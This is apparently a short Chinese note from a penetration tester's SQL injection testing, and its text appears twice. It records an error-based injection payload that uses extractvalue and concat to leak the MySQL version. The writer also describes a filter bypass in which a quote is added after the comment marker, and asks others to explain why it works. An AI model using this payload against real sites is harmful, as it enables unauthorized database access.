来自一次sql挖掘
在测试报错注入时,无意间发现一种新绕过
payload : 11'and(select extractvalue(1,concat(0x7e,@@version,0x7e)))--'
在--后边加单引号可以执行成功
不加单引号的情况
可以看到extractvalue没有执行但是页面有报错
目前不清楚是什么原理,记录一下,有大佬清楚的话可以说一下
在测试报错注入时,无意间发现一种新绕过
payload : 11'and(select extractvalue(1,concat(0x7e,@@version,0x7e)))--'
在--后边加单引号可以执行成功
不加单引号的情况
可以看到extractvalue没有执行但是页面有报错
目前不清楚是什么原理,记录一下,有大佬清楚的话可以说一下